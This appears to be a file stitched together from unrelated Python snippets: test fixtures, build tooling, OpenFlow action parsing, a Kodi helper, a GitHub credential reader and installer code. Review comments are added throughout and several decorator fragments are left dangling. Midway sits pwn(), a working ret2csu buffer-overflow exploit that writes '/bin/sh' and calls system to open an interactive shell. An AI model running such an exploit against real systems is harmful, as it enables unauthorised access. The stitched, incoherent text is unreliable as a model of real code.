    lists of parsed BIDs, flushed whenever a batch grows past 8000 entries;
    each successfully parsed record (minus its ``vuln_products`` key) is
    collected in ``extended_info_array``. Unparseable lines are skipped.
    """
    batch = set()
    output_array = []
    extended_info_array = []
    for raw_line in bid_list:
        try:
            json_data = json.loads(raw_line)
            parse_bid_from_json(json_data, batch)
            del json_data['vuln_products']
            extended_info_array.append(json_data)
        except (TypeError, ValueError):
            pass
        if (len(batch) > 8000):
            output_array.append(list(batch))
            batch = set()
    if batch:
        output_array.append(list(batch))
    return (output_array, extended_info_array)
def populate_broker_data(broker_server_dblink_setup):
    """Fixture: bulk-insert JSON test fixtures into broker DB tables, yield,
    then truncate every loaded table on teardown.

    NOTE(review): looks like a stripped @pytest.fixture — confirm upstream.
    """
    broker_data = {'sam_recipient': json.loads(Path('usaspending_api/recipient/tests/data/broker_sam_recipient.json').read_text()), 'subaward': json.loads(Path('usaspending_api/awards/tests/data/subaward.json').read_text()), 'cd_state_grouped': json.loads(Path('usaspending_api/transactions/tests/data/cd_state_grouped.json').read_text()), 'zips': json.loads(Path('usaspending_api/transactions/tests/data/zips.json').read_text()), 'cd_zips_grouped': json.loads(Path('usaspending_api/transactions/tests/data/cd_zips_grouped.json').read_text()), 'cd_city_grouped': json.loads(Path('usaspending_api/transactions/tests/data/cd_city_grouped.json').read_text()), 'cd_county_grouped': json.loads(Path('usaspending_api/transactions/tests/data/cd_county_grouped.json').read_text())}
    insert_statement = 'INSERT INTO %(table_name)s (%(columns)s) VALUES %(values)s'
    with connections[settings.DATA_BROKER_DB_ALIAS].cursor() as cursor:
        for (table_name, rows) in broker_data.items():
            # Column order comes from the first fixture row; values are
            # rendered verbatim with AsIs, with Python None mapped to SQL null.
            columns = list(rows[0])
            values = [str(tuple(r.values())).replace('None', 'null') for r in rows]
            sql_string = cursor.mogrify(insert_statement, {'table_name': AsIs(table_name), 'columns': AsIs(','.join(columns)), 'values': AsIs(','.join(values))})
            cursor.execute(sql_string)
    (yield)
    with connections[settings.DATA_BROKER_DB_ALIAS].cursor() as cursor:
        for table in broker_data:
            cursor.execute(f'TRUNCATE TABLE {table} RESTART IDENTITY CASCADE')
class ParallelBuildExt(*build_ext_classes):
    """build_ext command that cythonizes and compiles extensions in parallel,
    capping the job count by available memory."""

    @property
    def logger(self):
        # Restored as a property: this class itself reads ``self.logger.debug``
        # (see finalize_options), not ``self.logger().debug``.
        logger = get_logger(self.logger_name)
        return logger

    def initialize_options(self):
        """Set transonic-specific defaults on top of the base command."""
        super().initialize_options()
        self.logger_name = 'transonic'
        self.num_jobs_env_var = ''
        # Compiler flags to strip before compiling (exact / prefix matches).
        self.ignoreflags = ('-Wstrict-prototypes',)
        self.ignoreflags_startswith = ('-axMIC_', '-diag-disable:')

    def finalize_options(self):
        """Fill in ``parallel`` from the environment/CPU/memory heuristics."""
        if (self.parallel is None):
            self.parallel = self.get_num_jobs()
        super().finalize_options()
        self.logger.debug(f'Parallel build enabled with {self.parallel} jobs')
        self.logger.debug(f'Base classes: {build_ext_classes}')

    def get_num_jobs(self):
        """Return the parallel job count: the env-var override when set, else
        the CPU count capped so each job has roughly 3 GB of free memory."""
        try:
            num_jobs = int(os.environ[self.num_jobs_env_var])
        except KeyError:
            import multiprocessing
            num_jobs = multiprocessing.cpu_count()
            try:
                from psutil import virtual_memory
            except ImportError:
                self.logger.warning('psutil not available at build time. Cannot check memory available and potentially limit num_jobs.')
            else:
                # BUG FIX: was ``available / .0`` which raises
                # ZeroDivisionError; convert bytes to gigabytes instead.
                avail_memory_in_Go = (virtual_memory().available / 1e9)
                limit_num_jobs = max(1, round((avail_memory_in_Go / 3)))
                if (num_jobs > limit_num_jobs):
                    self.logger.info(f'num_jobs limited by memory, fixed at {limit_num_jobs}')
                    num_jobs = min(num_jobs, limit_num_jobs)
        return num_jobs

    def build_extensions(self):
        """Cythonize sources where supported, then defer to setuptools."""
        self.check_extensions_list(self.extensions)
        for ext in self.extensions:
            try:
                ext.sources = self.cython_sources(ext.sources, ext)
            except AttributeError:
                # Base class without Cython support: keep sources untouched.
                pass
        SetuptoolsBuildExt.build_extensions(self)

    def _build_extensions_parallel(self):
        """Group extensions by type and compile each group in a process pool."""
        logger = self.logger
        if hasattr(self.compiler, 'compiler_so'):
            # Drop flags known to break or spam some compilers.
            self.compiler.compiler_so = [key for key in self.compiler.compiler_so if ((key not in self.ignoreflags) and all([(not key.startswith(s)) for s in self.ignoreflags_startswith]))]
        ext_types = {type(ext) for ext in self.extensions}
        extensions_by_type = {T: [] for T in ext_types}
        for ext in self.extensions:
            extensions_by_type[ext.__class__].append(ext)

        def names(exts):
            return [ext.name for ext in exts]

        num_jobs = self.parallel
        logger.info(f'_build_extensions_parallel with num_jobs = {num_jobs}')
        for (type_ext, exts) in extensions_by_type.items():
            logger.info(f'Building extensions of type {type_ext}: {names(exts)}')
            with Pool(num_jobs) as pool:
                pool.map(self.build_extension, exts)
            logger.info(f'Extensions built: {names(exts)}')
class TestBashOperator(unittest.TestCase):
    """Behavioural tests for BashOperator: successful run, non-zero exit,
    stop, timeout on await_termination, and picklability."""

    def test_start_bash(self):
        """A bash command runs and its side effect (file removal) is visible."""
        test_file = os.path.join(os.path.abspath(os.path.dirname(__file__)), '.test_start_bash.test')
        open(test_file, 'a').close()
        self.assertTrue(os.path.isfile(test_file))
        with Workflow(name='workflow') as workflow:
            bash_operator = BashOperator(name='test_start_bash', bash_command='rm {}'.format(test_file))
        bash_operator.start(context={})
        bash_operator.await_termination(context={})
        self.assertEqual(1, len(workflow.tasks))
        self.assertFalse(os.path.isfile(test_file))

    def test_non_zero_exit_code(self):
        """A failing command raises AIFlowException with the expected message."""
        with Workflow(name='workflow'):
            bash_operator = BashOperator(name='test_non_zero_exit_code', bash_command='exit 2')
        with self.assertRaisesRegex(AIFlowException, 'Bash command failed\\. The command returned a non-zero exit code\\.'):
            bash_operator.start(context={})
            bash_operator.await_termination(context={})

    def test_stop(self):
        """Stopping a running operator kills its subprocess."""
        self.bash_operator = None

        def bash_op():
            with Workflow(name='workflow'):
                self.bash_operator = BashOperator(name='test_stop', bash_command='sleep 10')
            self.bash_operator.start(context={})

        _thread = threading.Thread(target=bash_op, daemon=True)
        _thread.start()
        # Give the thread time to start the subprocess before stopping it.
        time.sleep(0.1)
        self.bash_operator.stop(context={})
        time.sleep(0.1)
        with self.assertRaises(psutil.NoSuchProcess):
            psutil.Process(self.bash_operator.sub_process.pid)

    def test_await_termination(self):
        """await_termination with a short timeout raises TimeoutExpired."""
        self.bash_operator = None
        with Workflow(name='workflow'):
            self.bash_operator = BashOperator(name='test_await_termination', bash_command='sleep 1')
        self.bash_operator.start(context={})
        with self.assertRaises(TimeoutExpired):
            time.sleep(0.1)
            self.bash_operator.await_termination(context={}, timeout=0.1)

    def test_pickle(self):
        """A workflow containing a BashOperator must be cloudpickle-able."""
        with Workflow(name='workflow') as workflow:
            self.bash_operator = BashOperator(name='test_pickle', bash_command='sleep 1')
        self.assertIsNotNone(cloudpickle.dumps(workflow))
class HomeWindow():
    """Property store on the Kodi home window (id 10000), with every key
    namespaced by the add-on id."""

    def __init__(self):
        self.id_string = 'plugin.video.embycon-%s'
        self.window = xbmcgui.Window(10000)

    def _namespaced(self, key):
        # All properties share the add-on specific prefix.
        return (self.id_string % key)

    def get_property(self, key):
        """Return the stored value for ``key`` ('' when unset, per Kodi)."""
        return self.window.getProperty(self._namespaced(key))

    def set_property(self, key, value):
        """Store ``value`` under the namespaced ``key``."""
        self.window.setProperty(self._namespaced(key), value)

    def clear_property(self, key):
        """Remove the namespaced ``key`` from the window."""
        self.window.clearProperty(self._namespaced(key))
class Auth(object):
    """Read GitHub CLI ("gh") credentials from ~/.config/gh/hosts.yml and
    answer simple identity/contributor questions."""

    def __init__(self):
        self.hosts_yml = os.path.join(str(Path.home()), '.config', 'gh', 'hosts.yml')
        if os.path.exists(self.hosts_yml):
            with open(self.hosts_yml, 'r') as fh:
                self.hosts = yaml.safe_load(fh)
        else:
            # No gh config present: all lookups return None.
            self.hosts = None
        self.hostname = HOSTNAME
        self.secret_repo = SECRET_REPO

    def login(self):
        pass

    def logout(self):
        pass

    def status(self):
        """Return the full hosts entry for the configured hostname, or None."""
        return None if (self.hosts is None) else self.hosts[self.hostname]

    def user(self):
        """Return the configured user name, or None when not logged in."""
        return None if (self.hosts is None) else self.hosts[self.hostname]['user']

    def oauth_token(self):
        """Return the stored OAuth token, or None when not logged in."""
        return None if (self.hosts is None) else self.hosts[self.hostname]['oauth_token']

    def is_contributor(self):
        """True when the token can see the secret repo (i.e. the user is a
        contributor); False otherwise or when PyGithub is unavailable."""
        if (Github is None):
            return False
        gh = Github(login_or_token=self.oauth_token())
        try:
            return (gh.get_repo(self.secret_repo) is not None)
        except UnknownObjectException:
            return False
def _get_prescribing_for_codes(db, bnf_code_prefixes):
    """Sum prescribing matrices for the given BNF code prefixes, or use the
    precomputed all-presentations totals when no prefixes are supplied.

    Returns an ``(items, quantity, actual_cost)`` tuple; ``actual_cost`` is
    converted from pence to pounds when present.
    """
    if not bnf_code_prefixes:
        sql = 'SELECT items, quantity, actual_cost FROM all_presentations'
        params = []
    else:
        where_clause = ' OR '.join('bnf_code LIKE ?' for _ in bnf_code_prefixes)
        params = [(code + '%') for code in bnf_code_prefixes]
        sql = '\n SELECT\n matrix_sum(items) AS items,\n matrix_sum(quantity) AS quantity,\n matrix_sum(actual_cost) AS actual_cost\n FROM\n presentation\n WHERE\n {}\n '.format(where_clause)
    (items, quantity, actual_cost) = db.query_one(sql, params)
    if (actual_cost is not None):
        # Stored in pence; report pounds.
        actual_cost = (actual_cost / 100.0)
    return (items, quantity, actual_cost)
class OptionSeriesTilemapSonificationTracksMappingTremolo(Options):
    """Generated Highcharts accessor: tremolo mapping options for tilemap
    sonification tracks.

    NOTE(review): accessors of this generated family are usually
    @property-decorated; decorators are not visible here — confirm upstream.
    """

    def depth(self) -> 'OptionSeriesTilemapSonificationTracksMappingTremoloDepth':
        """Sub-configuration accessor for ``tremolo.depth``."""
        return self._config_sub_data('depth', OptionSeriesTilemapSonificationTracksMappingTremoloDepth)

    def speed(self) -> 'OptionSeriesTilemapSonificationTracksMappingTremoloSpeed':
        """Sub-configuration accessor for ``tremolo.speed``."""
        return self._config_sub_data('speed', OptionSeriesTilemapSonificationTracksMappingTremoloSpeed)
def _filter_constant_calls(calls: List[ast.Call]) -> List[ast.Call]:
    """Return only the calls whose positional arguments are all constant
    (string) literals.

    ``ast.Str`` was deprecated in Python 3.8 in favour of ``ast.Constant``;
    the node type to test is resolved once up front instead of re-importing
    ``sys`` and re-branching for every argument as before.
    """
    import sys
    constant_type = ast.Str if (sys.version_info < (3, 8)) else ast.Constant

    def _is_constant(arg: ast.expr) -> bool:
        return isinstance(arg, constant_type)

    return [call for call in calls if all(map(_is_constant, call.args))]
def test_that_run_workflow_component_enabled_when_workflows(qapp, tmp_path):
    """The 'Run workflow' tool is enabled when the config declares workflows."""
    config_file = (tmp_path / 'config.ert')
    config_lines = [
        'NUM_REALIZATIONS 1\n',
        'LOAD_WORKFLOW_JOB workflows/UBER_PRINT print_uber\n',
        'LOAD_WORKFLOW workflows/MAGIC_PRINT magic_print\n',
    ]
    with open(config_file, 'a+', encoding='utf-8') as ert_file:
        ert_file.writelines(config_lines)
    os.mkdir((tmp_path / 'workflows'))
    # Workflow MAGIC_PRINT invokes the UBER_PRINT job, which just runs `ls`.
    with open((tmp_path / 'workflows/MAGIC_PRINT'), 'w', encoding='utf-8') as f:
        f.write('print_uber\n')
    with open((tmp_path / 'workflows/UBER_PRINT'), 'w', encoding='utf-8') as f:
        f.write('EXECUTABLE ls\n')
    args = Mock()
    args.config = str(config_file)
    with add_gui_log_handler() as log_handler:
        (gui, *_) = ert.gui.main._start_initial_gui_window(args, log_handler)
        assert (gui.windowTitle() == 'ERT - config.ert')
        run_workflow_button = gui.tools['Run workflow']
        assert run_workflow_button.isEnabled()
def _to_notations(pitch: 'Pitch') -> List[str]:
    """Return every enharmonic spelling (up to double sharps/flats) of a MIDI
    pitch number, e.g. 60 -> ['D--4', 'C4', 'B#3'].

    For each alteration in -2..2, the natural (white-key) step that the
    altered pitch class would be spelled from is looked up; alterations that
    do not land on a natural step are skipped.
    """
    notations = []
    pitch_class = (pitch % 12)
    # MIDI convention: note 60 is C4.
    octave = ((pitch // 12) - 1)
    for alter in range((- 2), 3):
        pc = (pitch_class - alter)
        # Crossing below C or above B moves the spelling to the adjacent octave.
        if (pc < 0):
            o = (octave - 1)
        elif (pc > 11):
            o = (octave + 1)
        else:
            o = octave
        try:
            i = [0, 2, 4, 5, 7, 9, 11].index((pc % 12))
        except ValueError:
            # BUG FIX: was a bare ``except:`` — catch only the "not a natural
            # pitch class" case instead of masking everything.
            continue
        step = ['C', 'D', 'E', 'F', 'G', 'A', 'B'][i]
        acci = {0: '', 1: '#', 2: '##', (- 1): '-', (- 2): '--'}[alter]
        notation = ((step + acci) + str(o))
        notations.append(notation)
    return notations
def pwn():
    """Three-stage ret2csu-style exploit.

    Relies on module-level globals: ``io`` (the remote/process handle),
    ``elf``, the ``part1``/``part2`` csu gadget addresses, ``com_gadget``,
    ``binsh_addr``, ``system_ptr``, ``system_addr`` and ``_start_addr``.
    Buffer layout: 64-byte buffer + 8 bytes saved RBP before the return
    address; payloads are padded to 200 bytes.
    """
    # Stage 1: call read() via the csu gadget to write '/bin/sh\x00' into
    # binsh_addr, then return to _start for another round.
    payload = ('A' * (64 + 8))
    payload += com_gadget(part1, part2, elf.got['read'], 0, binsh_addr, 8)
    payload += p64(_start_addr)
    payload = payload.ljust(200, 'A')
    io.send(payload)
    io.sendafter('bye~\n', '/bin/sh\x00')
    # Stage 2: call read() again to write the real system address into
    # system_ptr, then return to _start once more.
    payload = ('A' * (64 + 8))
    payload += com_gadget(part1, part2, elf.got['read'], 0, system_ptr, 8)
    payload += p64(_start_addr)
    payload = payload.ljust(200, 'A')
    io.send(payload)
    io.sendafter('bye~\n', p64(system_addr))
    # Stage 3: invoke system('/bin/sh') through the pointer written above
    # and drop into an interactive shell.
    payload = ('A' * (64 + 8))
    payload += com_gadget(part1, part2, system_ptr, binsh_addr)
    payload = payload.ljust(200, 'A')
    io.send(payload)
    io.interactive()
class OptionSeriesAreaSonificationTracksMappingHighpass(Options):
    """Generated Highcharts accessor: highpass-filter mapping options for
    area-series sonification tracks.

    NOTE(review): accessors of this generated family are usually
    @property-decorated; decorators are not visible here — confirm upstream.
    """

    def frequency(self) -> 'OptionSeriesAreaSonificationTracksMappingHighpassFrequency':
        """Sub-configuration accessor for ``highpass.frequency``."""
        return self._config_sub_data('frequency', OptionSeriesAreaSonificationTracksMappingHighpassFrequency)

    def resonance(self) -> 'OptionSeriesAreaSonificationTracksMappingHighpassResonance':
        """Sub-configuration accessor for ``highpass.resonance``."""
        return self._config_sub_data('resonance', OptionSeriesAreaSonificationTracksMappingHighpassResonance)
# NOTE(review): the bare "(scope='function')" below reads as the argument
# list of a stripped @pytest.fixture decorator; confirm upstream.
(scope='function')
def saas_external_example_connection_config(db: Session, saas_external_example_config: Dict[(str, Any)], saas_example_secrets: Dict[(str, Any)]) -> Generator:
    """Yield a writable SaaS ConnectionConfig built from the example config;
    the config is deleted on teardown."""
    fides_key = saas_external_example_config['fides_key']
    connection_config = ConnectionConfig.create(db=db, data={'key': fides_key, 'name': fides_key, 'connection_type': ConnectionType.saas, 'access': AccessLevel.write, 'secrets': saas_example_secrets, 'saas_config': saas_external_example_config})
    (yield connection_config)
    connection_config.delete(db)
def test_default_value_missing():
    """A record field with no value and no schema default must raise.

    BUG FIX: the original docstring was a lone unterminated quote (a syntax
    error); restored as a proper docstring.
    """
    schema = {'type': 'record', 'name': 'test_default_value_missing', 'fields': [{'name': 'string', 'type': 'string'}]}
    record = {}
    new_file = StringIO(json.dumps(record))
    with pytest.raises(ValueError, match='no value and no default'):
        next(json_reader(new_file, schema))
def split_simple_multistream_parallel_ops(ops_by_order, max_parallel_ops: int):
    """Chunk the ops of each execution order into groups of at most
    ``max_parallel_ops``, visiting execution orders in ascending order.

    Chunks never span two execution orders; empty orders contribute nothing.
    """
    assert (max_parallel_ops > 0)
    output = []
    for execution_order in sorted(ops_by_order):
        ops = list(ops_by_order[execution_order])
        output.extend(ops[start:(start + max_parallel_ops)] for start in range(0, len(ops), max_parallel_ops))
    return output
def to_action(dic, ofp, parser, action_type, util):
    """Translate a JSON-style action description into an OFPAction instance.

    ``dic`` holds the action's parameters, ``ofp``/``parser`` are the
    protocol constants / parser classes for the negotiated OpenFlow version,
    and ``util`` converts user-facing port/queue/group numbers. Returns
    ``None`` when the action type (or its data encoding) is not recognised.
    """
    # Zero-argument actions, keyed by action type.
    actions = {COPY_TTL_OUT: parser.OFPActionCopyTtlOut, COPY_TTL_IN: parser.OFPActionCopyTtlIn, DEC_MPLS_TTL: parser.OFPActionDecMplsTtl, POP_VLAN: parser.OFPActionPopVlan, DEC_NW_TTL: parser.OFPActionDecNwTtl}
    # PBB actions only exist in OpenFlow versions newer than 1.2.
    if (ofp.OFP_VERSION > ofproto_v1_2.OFP_VERSION):
        actions[POP_PBB] = parser.OFPActionPopPbb
    # Actions that take a single 'ethertype' argument.
    need_ethertype = {PUSH_VLAN: parser.OFPActionPushVlan, PUSH_MPLS: parser.OFPActionPushMpls, POP_MPLS: parser.OFPActionPopMpls}
    if (ofp.OFP_VERSION > ofproto_v1_2.OFP_VERSION):
        need_ethertype[PUSH_PBB] = parser.OFPActionPushPbb
    if (action_type in actions):
        return actions[action_type]()
    elif (action_type in need_ethertype):
        ethertype = str_to_int(dic.get('ethertype'))
        return need_ethertype[action_type](ethertype)
    elif (action_type == OUTPUT):
        out_port = util.ofp_port_from_user(dic.get('port', ofp.OFPP_ANY))
        max_len = util.ofp_cml_from_user(dic.get('max_len', ofp.OFPCML_MAX))
        return parser.OFPActionOutput(out_port, max_len)
    elif (action_type == SET_MPLS_TTL):
        mpls_ttl = str_to_int(dic.get('mpls_ttl'))
        return parser.OFPActionSetMplsTtl(mpls_ttl)
    elif (action_type == SET_QUEUE):
        queue_id = util.ofp_queue_from_user(dic.get('queue_id'))
        return parser.OFPActionSetQueue(queue_id)
    elif (action_type == GROUP):
        group_id = util.ofp_group_from_user(dic.get('group_id'))
        return parser.OFPActionGroup(group_id)
    elif (action_type == SET_NW_TTL):
        nw_ttl = str_to_int(dic.get('nw_ttl'))
        return parser.OFPActionSetNwTtl(nw_ttl)
    elif (action_type == SET_FIELD):
        field = dic.get('field')
        value = dic.get('value')
        return parser.OFPActionSetField(**{field: value})
    elif (action_type == 'COPY_FIELD'):
        n_bits = str_to_int(dic.get('n_bits'))
        src_offset = str_to_int(dic.get('src_offset'))
        dst_offset = str_to_int(dic.get('dst_offset'))
        oxm_ids = [parser.OFPOxmId(str(dic.get('src_oxm_id'))), parser.OFPOxmId(str(dic.get('dst_oxm_id')))]
        return parser.OFPActionCopyField(n_bits, src_offset, dst_offset, oxm_ids)
    elif (action_type == 'METER'):
        # OFPActionMeter is not present in every parser version; probe for it.
        if hasattr(parser, 'OFPActionMeter'):
            meter_id = str_to_int(dic.get('meter_id'))
            return parser.OFPActionMeter(meter_id)
        else:
            return None
    elif (action_type == EXPERIMENTER):
        experimenter = str_to_int(dic.get('experimenter'))
        data_type = dic.get('data_type', 'ascii')
        if (data_type not in ('ascii', 'base64')):
            LOG.error('Unknown data type: %s', data_type)
            return None
        data = dic.get('data', '')
        if (data_type == 'base64'):
            data = base64.b64decode(data)
        return parser.OFPActionExperimenterUnknown(experimenter, data)
    # Unknown action type.
    return None
class Installer(BaseInstaller):
    """One-shot environment installers for ersilia: shell profile, conda,
    git, rdkit, config file, base conda environment and docker server image.

    Every step is skipped when its ``_is_done`` marker is already recorded.
    """

    def __init__(self, check_install_log=True, config_json=None, credentials_json=None):
        BaseInstaller.__init__(self, check_install_log=check_install_log, config_json=config_json, credentials_json=credentials_json)

    def profile(self):
        """Add the ersilia CLI snippet to the user's shell profile."""
        if self._is_done('profile'):
            return
        from ..default import bashrc_cli_snippet
        click.echo(">> Setting up 'ersilia' CLI in user profile")
        bashrc_cli_snippet()

    def conda(self):
        """Exit with an error unless the conda tool is available."""
        if self._is_done('conda'):
            return
        if self._is_tool('conda'):
            return
        click.echo('Conda needs to be installed')
        sys.exit(1)

    def git(self):
        """Exit with an error unless git is available."""
        if self._is_done('git'):
            return
        if self._is_tool('git'):
            return
        click.echo('Git needs to be installed')
        sys.exit(1)

    def rdkit(self):
        """Install RDKit through conda when it cannot be imported."""
        if self._is_done('rdkit'):
            return
        try:
            import rdkit
            exists = True
        except ModuleNotFoundError:
            exists = False
        if exists:
            return
        click.echo('>> Installing RDKit from Conda')
        run_command('conda install -c conda-forge -y -q rdkit')

    def config(self):
        """Create the config file unless one already exists."""
        if self._is_done('config'):
            return
        if os.path.exists(os.path.join(EOS, CONFIG_JSON)):
            return
        click.echo('>> Setting up Config file')
        checker = Checker()
        checker.config()

    def _clone_repo(self, path):
        """Copy the local development checkout when available, otherwise
        clone the hub package from GitHub; returns the repo path."""
        path_repo = os.path.join(path, self.cfg.HUB.PACKAGE)
        dev_path = self.development_path
        if (dev_path is not None):
            shutil.copytree(dev_path, path_repo)
        else:
            from .download import GitHubDownloader
            gd = GitHubDownloader(overwrite=True)
            gd.clone(self.cfg.HUB.ORG, self.cfg.HUB.PACKAGE, path_repo)
        return path_repo

    def base_conda(self):
        """Create the versioned base conda environment by writing and running
        a bash bootstrap script inside a temporary clone of the repo."""
        if self._is_done('base_conda'):
            return
        eos_base_env = self.versions.base_conda_name()
        sc = SimpleConda()
        if sc.exists(eos_base_env):
            return
        tmp_folder = tempfile.mkdtemp(prefix='ersilia-')
        tmp_repo = self._clone_repo(tmp_folder)
        tmp_script = os.path.join(tmp_folder, 'script.sh')
        tmp_python_script = os.path.join(tmp_folder, 'base_installer.py')
        is_base = sc.is_base()
        if (not is_base):
            # Deactivate the currently active (non-base) environment first.
            bash_script = '\n source {0}/etc/profile.d/conda.sh\n conda deactivate\n '.format(sc.conda_prefix(False))
        else:
            bash_script = ''
        bash_script += '\n source {0}/etc/profile.d/conda.sh\n '.format(sc.conda_prefix(True))
        bc = SetupBaseConda()
        python_version = self.versions.python_version()
        python_version = bc.find_closest_python_version(python_version)
        bash_script += '\n cd {0}\n conda create -n {1} python={2} -y\n conda activate {1}\n pip install -e .\n python {3}\n conda deactivate\n '.format(tmp_repo, eos_base_env, python_version, tmp_python_script)
        with open(tmp_script, 'w') as f:
            f.write(bash_script)
        python_script = '\n from ersilia.utils.installers import base_installer\n base_installer(ignore_status=True)\n '
        with open(tmp_python_script, 'w') as f:
            lines = python_script.split('\n')
            for l in lines:
                # l[8:] strips the leading indentation of the embedded
                # template. NOTE(review): with the template text shown here
                # this would also eat part of each line — the template's
                # original indentation may have been wider; confirm upstream.
                f.write((l[8:] + '\n'))
        click.echo('>> Creating a Base Conda environment {0}'.format(eos_base_env))
        run_command('bash {0}'.format(tmp_script))

    def base_conda_slim(self):
        # Placeholder: nothing to do beyond the done-marker check.
        if self._is_done('base_conda_slim'):
            return

    def server_docker(self):
        """Build the versioned bentoml server docker image from a temporary
        clone of the repo, unless the image already exists."""
        if self._is_done('server_docker'):
            return
        import tempfile
        from .docker import SimpleDocker
        docker = SimpleDocker()
        (org, img, tag) = self.versions.server_docker_name(as_tuple=True)
        if docker.exists(org, img, tag):
            return
        tmp_dir = tempfile.mkdtemp(prefix='ersilia-')
        tmp_repo = self._clone_repo(tmp_dir)
        dockerfile = '\n FROM bentoml/model-server:{0}-{1}\n MAINTAINER ersilia\n\n ENV LC_ALL=C.UTF-8\n ENV LANG=C.UTF-8\n\n WORKDIR {2}\n\n COPY . .\n\n RUN conda --version\n\n RUN pip install .\n RUN ersilia setup --base\n '.format(self.versions.bentoml_version(), self.versions.python_version(py_format=True), self.cfg.ENV.DOCKER.IMAGE_WORKDIR)
        path = os.path.join(tmp_repo, 'Dockerfile')
        with open(path, 'w') as f:
            lines = dockerfile.split('\n')
            # Drop the first and last (empty) lines of the template.
            lines = lines[1:(- 1)]
            for l in lines:
                # Same indentation-stripping caveat as in base_conda above.
                f.write((l[8:] + '\n'))
        click.echo('>> Building docker server image {0}'.format(self.versions.server_docker_name(as_tuple=False)))
        docker.build(path=tmp_repo, org=org, img=img, tag=tag)

    def server_docker_slim(self):
        # Placeholder: nothing to do beyond the done-marker check.
        if self._is_done('server_docker_slim'):
            return
def test_service_create(service: Service, default_entity_dict):
    """Creating via the service persists a matching ServeEntity row."""
    entity: ServerResponse = service.create(ServeRequest(**default_entity_dict))
    expected_fields = {
        'chat_scene': 'chat_data',
        'sub_chat_scene': 'excel',
        'prompt_type': 'common',
        'prompt_name': 'my_prompt_1',
        'content': 'Write a qsort function in python.',
        'user_name': 'zhangsan',
        'sys_code': 'dbgpt',
    }
    with db.session() as session:
        db_entity: ServeEntity = session.get(ServeEntity, entity.id)
        assert db_entity.id == entity.id
        for field_name, expected_value in expected_fields.items():
            assert getattr(db_entity, field_name) == expected_value
        # Timestamps are filled in automatically on insert.
        assert db_entity.gmt_created is not None
        assert db_entity.gmt_modified is not None
class Migration(migrations.Migration):
    """Add ``Theme.language_chooser_control``: choice between the default and
    a minimal select widget for the admin language chooser."""

    dependencies = [('admin_interface', '0024_remove_theme_css')]
    operations = [migrations.AddField(model_name='theme', name='language_chooser_control', field=models.CharField(choices=[('default-select', 'Default Select'), ('minimal-select', 'Minimal Select')], default='default-select', max_length=20, verbose_name='control'))]
# NOTE(review): the ".parametrize(...)" line below reads as the argument list
# of a stripped @pytest.mark.parametrize decorator; confirm upstream.
.parametrize('remote_caps,local_caps,expected', (((A1,), (A1,), (A1,)), ((B1,), (B1,), (B1,)), ((A1, B1), (A1, B1), (A1, B1)), ((A1, B1), (B1, A1), (A1, B1)), ((B1, A1), (A1, B1), (A1, B1)), ((B1, A1), (B1, A1), (A1, B1)), ((A1, A2), (A2,), (A2,)), ((A1, A2), (A1,), (A1,)), ((A1,), (A1, A2), (A1,)), ((A2,), (A1, A2), (A2,)), ((A1, B1, A2, B2), (A1, B1, A2, B2), (A2, B2)), ((A1, B1, A2, B2), (A1, B1, A2), (A2, B1)), ((A1, B1, B2), (A1, B1, A2, B2), (A1, B2)), ((A1, B1, A2, B2), (A1, A2), (A2,)), ((A1, B1, B2), (A1, A2), (A1,)), ((A1,), (A2,), ()), ((A2,), (A1,), ()), ((B1,), (A1,), ()), ((B1, A1), (B2, A2), ()), ((B1, B2), (A1, A2), ())))
def test_select_p2p_capabiltiies(remote_caps, local_caps, expected):
    """_select_capabilities returns the mutually supported capabilities for
    each remote/local pairing (empty tuple when nothing matches)."""
    actual = _select_capabilities(remote_caps, local_caps)
    assert (actual == expected)
# NOTE(review): ".compilertest" reads as a stripped decorator reference;
# confirm upstream.
.compilertest
def test_mapping_host_authority_and_host():
    """A Mapping that sets both a ':authority' header match and 'host' must
    compile without errors and yield exactly one matching group."""
    test_yaml = '\n---\napiVersion: getambassador.io/v3alpha1\nkind: Mapping\nmetadata:\n  name: good-host-mapping\n  namespace: default\nspec:\n  headers:\n    ":authority": bar.example.com\n  host: foo.example.com\n  prefix: /wanted_group/\n  service: star\n'
    r = compile_with_cachecheck(test_yaml, errors_ok=True)
    ir = r['ir']
    errors = ir.aconf.errors
    assert (len(errors) == 0), ('Expected no errors but got %s' % json.dumps(errors, sort_keys=True, indent=4))
    found = 0
    for g in ir.groups.values():
        if (g.prefix == '/wanted_group/'):
            # The explicit 'host' field must win for the group's host.
            assert (g.host == 'foo.example.com')
            found += 1
    assert (found == 1), ('Expected 1 /wanted_group/ prefix, got %d' % found)
class ParametrizingString(text_type):
    """A terminal capability string that can be called with parameters (e.g.
    cursor positioning); calling it runs ``tparm`` and optionally re-wraps
    the result so it can chain with a "normal" attribute-reset sequence."""

    def __new__(cls, formatting, normal=None):
        """Build from the raw capability template; ``normal`` is the
        attribute-reset sequence enabling FormattingString chaining."""
        new = text_type.__new__(cls, formatting)
        new._normal = normal
        return new

    def __call__(self, *args):
        try:
            # tparm works on bytes; latin1 round-trips all byte values 0-255.
            parametrized = tparm(self.encode('latin1'), *args).decode('latin1')
            return (parametrized if (self._normal is None) else FormattingString(parametrized, self._normal))
        except curses.error:
            # Unsupported capability/parameters: render as nothing.
            return u''
        except TypeError:
            # A lone string argument usually means the caller misspelled a
            # formatting call; give a targeted error, otherwise re-raise.
            if ((len(args) == 1) and isinstance(args[0], string_types)):
                raise TypeError(('A native or nonexistent capability template received %r when it was expecting ints. You probably misspelled a formatting call like bright_red_on_white(...).' % args))
            else:
                raise
# NOTE(review): the route/status/security tuple below reads as the argument
# list of a stripped router decorator (e.g. @router.patch(...)); confirm.
(PRIVACY_REQUEST_MANUAL_WEBHOOK_ERASURE_INPUT, status_code=HTTP_200_OK, dependencies=[Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_UPLOAD_DATA])], response_model=None)
def upload_manual_webhook_erasure_data(*, connection_config: ConnectionConfig=Depends(_get_connection_config), privacy_request_id: str, db: Session=Depends(deps.get_db), input_data: Dict[(str, Any)]) -> None:
    """Persist manually uploaded *erasure* data for a privacy request's
    manual webhook (delegates to the shared input handler)."""
    _handle_manual_webhook_input(action='erasure', connection_config=connection_config, privacy_request_id=privacy_request_id, db=db, input_data=input_data)
class Wrapper():
    """State keeper and dispatcher for IB API callbacks.

    All attributes annotated below are (re)initialized in ``reset``.
    """
    ib: 'IB'
    # Account and portfolio state.
    accountValues: Dict[(tuple, AccountValue)]
    acctSummary: Dict[(tuple, AccountValue)]
    portfolio: Dict[(str, Dict[(int, PortfolioItem)])]
    positions: Dict[(str, Dict[(int, Position)])]
